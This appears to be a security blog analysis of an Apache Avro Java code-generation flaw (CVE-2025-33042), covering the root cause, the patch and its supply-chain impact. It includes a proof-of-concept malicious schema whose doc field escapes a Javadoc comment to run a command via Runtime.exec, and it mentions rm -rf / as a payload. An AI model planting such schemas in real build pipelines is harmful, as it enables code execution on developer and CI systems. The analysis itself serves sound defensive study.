Schema to Shell: Unpacking the Apache Avro Code Injection Vulnerability
Feb 14, 2026
Executive Summary (TL;DR)
The Apache Avro Java SDK failed to sanitize schema metadata before generating Java source code. An attacker can craft a malicious schema that, when compiled by a developer or build server, injects and executes arbitrary Java code (RCE). Fixed in versions 1.11.5 and 1.12.1.
Apache Avro, the serialization backbone of the big data ecosystem, contained a critical code injection vulnerability in its Java SDK. The flaw allowed attackers to weaponize Avro schemas—typically benign JSON definitions—to inject arbitrary Java code during the compilation phase. By manipulating metadata fields like documentation or annotations, a malicious schema could trick the `SpecificCompiler` into generating a Trojan horse Java class. This effectively turns a standard build process into a Remote Code Execution (RCE) vector, threatening developer workstations and CI/CD pipelines alike.
The Trojan Schema
In the world of software engineering, code generation is the lazy developer's best friend. We love tools that take a definition file and spit out thousands of lines of boilerplate so we don't have to. Apache Avro does exactly this: you feed it a JSON schema defining your data, and it hands you a pristine Java class ready for serialization. It’s the plumbing behind Kafka, Hadoop, and countless microservices. But here is the catch: we implicitly trust that the generator isn't going to betray us.
CVE-2025-33042 creates a scenario where that trust is fatal. The vulnerability resides in the SpecificCompiler, the component responsible for translating those innocent-looking JSON schemas into executable Java source code. The compiler assumed that the metadata inside a schema—specifically documentation strings and custom annotations—was just text. It didn't expect that text to contain Java syntax.
This is a classic 'injection' vulnerability, but with a twist. It's not happening at runtime when the application handles a request; it's happening at build time. This means the victim is the developer running mvn compile or the CI/CD server building the release artifacts. It transforms the build pipeline itself into the attack surface, allowing an attacker to execute code with the privileges of the build user—often a highly privileged account with access to signing keys and cloud credentials.
The Logic Flaw: Blind Trust
The root cause is embarrassingly simple: string concatenation without sanitization. The `SpecificCompiler` uses Apache Velocity templates to construct the Java files. When it encounters a `doc` field in the Avro schema, it blindly pastes that content into a Javadoc comment in the generated file. When it sees a `javaAnnotation` property, it pastes it right above the class or field declaration.
Consider the Javadoc vector. The compiler attempts to generate code that looks like this:
/** [INSERT_DOC_HERE] */
public class User ...
The developers forgot that in Java, comments have a terminator: `*/`. If an attacker supplies a documentation string that includes `*/`, they can prematurely close the comment block. Once the comment is closed, the template keeps writing whatever text follows, and the Java compiler later treats that text as live code. It's the Java equivalent of SQL injection's classic `' OR 1=1; --`.
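The breakout can be reproduced with a few lines of plain string concatenation. The sketch below is a hypothetical stand-in for the template step, not Avro's actual code: the class `NaiveJavadocTemplate` and its `render` method are invented for illustration.

```java
// Hypothetical stand-in for the vulnerable template step; not Avro's code.
class NaiveJavadocTemplate {

    // Pastes the schema's doc string into a Javadoc comment with no escaping.
    static String render(String doc, String className) {
        return "/** " + doc + " */\n" + "public class " + className + " {}";
    }

    public static void main(String[] args) {
        // A benign doc string stays inside the comment.
        System.out.println(render("A user record.", "User"));

        // A doc string containing */ closes the comment early, so the text
        // after it is emitted as ordinary source code.
        System.out.println(render("*/ class Injected {} /*", "User"));
    }
}
```

In the second call, `class Injected {}` ends up outside any comment, which is exactly the position an attacker needs.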
The same logic applied to the `javaAnnotation` field. The compiler expected a valid annotation like `@Deprecated` or `@Nullable`. It did not anticipate a string like `@MyAnnotation public static void main...`. By failing to validate that the input was actually a valid annotation and nothing more, the compiler allowed the schema to redefine the structure of the generated class entirely.
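The missing check amounts to an allow-list on the shape of the annotation string. The following is a minimal sketch under assumptions: the class `AnnotationShapeCheck`, its regular expressions, and the optional leading `@` are all hypothetical and are not taken from Avro.

```java
import java.util.regex.Pattern;

// Hypothetical allow-list check; the patterns are illustrative assumptions.
class AnnotationShapeCheck {

    // A simple (ASCII-only) Java identifier, optionally package-qualified.
    private static final String IDENT = "[A-Za-z_$][A-Za-z0-9_$]*";
    private static final String QUALIFIED = IDENT + "(?:\\." + IDENT + ")*";

    // A single parenthesized argument list with no nested parentheses,
    // braces, or semicolons. Deliberately conservative.
    private static final String PARAMS = "\\([^(){};]*\\)";

    private static final Pattern SAFE =
        Pattern.compile("@?" + QUALIFIED + "(?:" + PARAMS + ")?");

    // True only if the whole string is an annotation name plus optional arguments.
    static boolean isSafe(String annotation) {
        return annotation != null && SAFE.matcher(annotation).matches();
    }

    public static void main(String[] args) {
        System.out.println(isSafe("@Deprecated"));
        System.out.println(isSafe("@MyAnnotation public static void main(String[] a) {}"));
    }
}
```

Because `matches()` must consume the entire input, anything trailing the annotation, such as an extra method declaration, causes the string to be rejected.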
Source Code Forensics
The fix provided in commit 84bc7322ca1c04ab4a8e4e708acf1e271541aac4 reveals the severity of the oversight. The maintainers had to introduce strict validation and escaping where previously there was none. Let's look at the changes in SpecificCompiler.java.
The Annotation Fix:
Previously, `javaAnnotation` was accepted as-is. The patch introduces a strict regex pattern, `VALID_AS_ANNOTATION`, that accepts only an identifier optionally followed by a parameter list. If the input contains anything beyond that shape (for example the curly braces or semicolons of an injected code block), the compiler now rejects it.
// The new sheriff in town
private static final Pattern VALID_AS_ANNOTATION = Pattern.compile(
    String.format("%s(?:%s)?", PATTERN_IDENTIFIER, PATTERN_PARAMETER_LIST));
The Javadoc Fix:
For the documentation vector, they introduced a new utility method escapeForJavadoc. This method scans the input string specifically for the */ sequence. If found, it breaks the sequence up using HTML entities, ensuring the Java compiler sees it as text rather than a syntax token.
// Before: return this.doc;
// After:
public static String escapeForJavadoc(String doc) {
    if (doc == null) return null;
    // Replaces */ with *&#47; (the slash written as an HTML entity)
    return doc.replace("*/", "*&#47;");
}
This change forces the malicious payload to remain trapped inside the comment block, rendering it inert. It is a textbook example of output encoding: never write user-supplied data to a sink (in this case, a source file) without encoding it for the context.
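To see why the escape neutralizes the breakout, it helps to count comment terminators before and after. This sketch assumes the replacement entity is `&#47;`, consistent with the "HTML entities" description above. The class `JavadocEscapeDemo` and the helper `countTerminators` are hypothetical.

```java
// Illustrative demo; the &#47; entity and helper names are assumptions.
class JavadocEscapeDemo {

    // Rewrites the slash of every */ as an HTML entity, so the Java lexer
    // never sees a comment terminator inside the doc text.
    static String escapeForJavadoc(String doc) {
        if (doc == null) {
            return null;
        }
        return doc.replace("*/", "*&#47;");
    }

    // Counts how many comment terminators (*/) appear in a piece of text.
    static int countTerminators(String text) {
        int count = 0;
        for (int i = text.indexOf("*/"); i >= 0; i = text.indexOf("*/", i + 2)) {
            count++;
        }
        return count;
    }

    public static void main(String[] args) {
        String hostile = "*/ static { } /*";
        String unescaped = "/** " + hostile + " */";
        String escaped = "/** " + escapeForJavadoc(hostile) + " */";
        // Two terminators means the comment was closed early; one means
        // only the template's own closing */ remains.
        System.out.println(countTerminators(unescaped));
        System.out.println(countTerminators(escaped));
    }
}
```

With the escape applied, the only `*/` left is the one the template itself writes, so the whole payload stays comment text.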
Breaking Out of the Box
To exploit this, an attacker doesn't need to touch the production server. They just need to get a malicious .avsc file into the project's source tree. This could be done via a Pull Request (hiding the exploit in a large schema change) or by compromising a schema registry that the build process polls.
Here is how a researcher—or an adversary—would construct the payload. We want to execute calc.exe (or rm -rf /) when the class is loaded. We use the doc field to break out of the comment and inject a static initialization block.
The Malicious Schema:
{
  "type": "record",
  "name": "TrojanRecord",
  "doc": "*/ static { try { java.lang.Runtime.getRuntime().exec(\"calc.exe\"); } catch(Exception e) {} } /*",
  "fields": []
}
The Generated Code (Vulnerable):
When mvn compile runs, the SpecificCompiler generates TrojanRecord.java:
/** */ static { try { java.lang.Runtime.getRuntime().exec("calc.exe"); } catch(Exception e) {} } /* */
@org.apache.avro.specific.AvroGenerated
public class TrojanRecord extends ...
Notice what happened? The leading `/**` from the template is closed by the `*/` at the start of our payload, so the static block that follows is live code rather than comment text. The trailing `/*` from our payload then pairs with the template's own `*/`, commenting out the leftover at the end. One caveat: Java only permits a static initializer inside a class body, so for `javac` to accept the output the payload has to land there, for example through a field-level `doc` rather than the record-level one. Once it does, the Java compiler in the next build step produces valid bytecode that runs the command as soon as the class is loaded.
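The comment pairing described above can be checked mechanically by deleting every block comment from the generated line and looking at what survives. This is a rough sketch, not a Java lexer: the class `CommentStripper` is hypothetical, it ignores string literals and `//` comments, and a harmless `println` stands in for the real payload.

```java
// Illustration only: a naive block-comment remover, not a real Java lexer.
class CommentStripper {

    // Removes every /* ... */ span and returns the remaining "live" text.
    static String stripBlockComments(String source) {
        StringBuilder live = new StringBuilder();
        int pos = 0;
        while (true) {
            int open = source.indexOf("/*", pos);
            if (open < 0) {
                live.append(source.substring(pos));
                return live.toString();
            }
            live.append(source, pos, open);
            int close = source.indexOf("*/", open + 2);
            if (close < 0) {
                // An unterminated comment swallows the rest of the input.
                return live.toString();
            }
            pos = close + 2;
        }
    }

    public static void main(String[] args) {
        // Same shape as the generated line above, with a benign payload.
        String generated =
            "/** */ static { System.out.println(\"injected\"); } /* */";
        System.out.println(stripBlockComments(generated).trim());
    }
}
```

What remains after stripping is the injected static block on its own, confirming that both template delimiters were consumed by the payload's `*/` and `/*`.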
The Supply Chain Nightmare
The impact of CVE-2025-33042 extends beyond simple Remote Code Execution; it is a supply chain vulnerability. In modern development, schemas are often shared assets. A central team might define the User schema, and twenty downstream microservices consume it to generate their POJOs.
If an attacker can poison that central schema definition, every single downstream service that updates its dependencies and rebuilds will be compromised simultaneously. This is the 'write once, pwn everywhere' model. The code executes during the build, which often takes place in environments with elevated privileges—access to private artifact repositories, cloud deployment keys, and signing certificates.
Furthermore, because the malicious code is baked into the generated Java class, it persists into the final JAR artifact. If the static block logic is subtle (e.g., opening a reverse shell only on a specific date), it could be deployed to production servers, turning the application itself into a backdoor. This bypasses traditional SAST tools because the malicious code isn't in the source repository—it's ephemeral, existing only in the target/generated-sources directory during the build.
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Affected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
| Apache Avro Java SDK (Apache Software Foundation) | <= 1.11.4 | 1.11.5 |
| Apache Avro Java SDK (Apache Software Foundation) | 1.12.0 | 1.12.1 |
| Attribute | Detail |
|---|---|
| CVE ID | CVE-2025-33042 |
| CVSS v3.1 | 7.3 (High) |
| CWE | CWE-94 (Code Injection) |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L |
| Impact | Remote Code Execution (Build-time or Run-time) |
| Fix Versions | 1.11.5, 1.12.1 |
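The affected ranges listed above (1.11.4 and earlier, plus 1.12.0) can be turned into a quick check against the Avro version a project pins. This is a minimal sketch: the class `AvroVersionCheck` is hypothetical and it only understands plain `major.minor.patch` strings, not qualifiers such as `-SNAPSHOT`.

```java
// Hypothetical helper encoding the affected ranges from the tables above.
class AvroVersionCheck {

    // Parses "major.minor.patch" into three ints.
    static int[] parse(String version) {
        String[] parts = version.trim().split("\\.");
        if (parts.length != 3) {
            throw new IllegalArgumentException("expected major.minor.patch: " + version);
        }
        int[] out = new int[3];
        for (int i = 0; i < 3; i++) {
            out[i] = Integer.parseInt(parts[i]);
        }
        return out;
    }

    // Lexicographic comparison of two parsed versions.
    static int compare(int[] a, int[] b) {
        for (int i = 0; i < 3; i++) {
            if (a[i] != b[i]) {
                return Integer.compare(a[i], b[i]);
            }
        }
        return 0;
    }

    // Affected: anything up to and including 1.11.4, and exactly 1.12.0.
    static boolean isAffected(String version) {
        int[] v = parse(version);
        boolean onOldLine = compare(v, new int[] {1, 11, 4}) <= 0;
        boolean isFirst112 = compare(v, new int[] {1, 12, 0}) == 0;
        return onOldLine || isFirst112;
    }

    public static void main(String[] args) {
        for (String v : new String[] {"1.11.4", "1.11.5", "1.12.0", "1.12.1"}) {
            System.out.println(v + " affected: " + isAffected(v));
        }
    }
}
```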
MITRE ATT&CK Mapping
CWE-94 definition: The software constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize, or incorrectly neutralizes, special elements that could modify the syntax or behavior of the intended code segment.